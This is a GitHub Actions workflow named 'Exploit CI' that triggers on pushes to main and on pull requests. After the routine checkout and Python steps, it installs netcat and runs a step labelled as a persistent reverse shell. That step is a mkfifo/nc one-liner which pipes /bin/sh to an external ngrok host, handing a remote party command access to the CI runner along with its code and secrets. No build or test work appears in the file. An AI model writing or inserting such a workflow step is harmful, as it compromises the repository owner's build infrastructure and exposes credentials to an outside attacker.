name: Exploit CI

on:
  push:
    branches:
      - main
  pull_request:

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
    - name: Checkout code
      uses: actions/checkout@v2

    - name: Set up Python
      uses: actions/setup-python@v2
      with:
        python-version: '3.8'

    - name: Install netcat
      run: sudo apt-get install -y netcat

    - name: Set up Persistent Reverse Shell Listener
      run: |
          mkfifo /tmp/f; nc 6.tcp.us-cal-1.ngrok.io 11056 < /tmp/f | /bin/sh > /tmp/f 2>&1
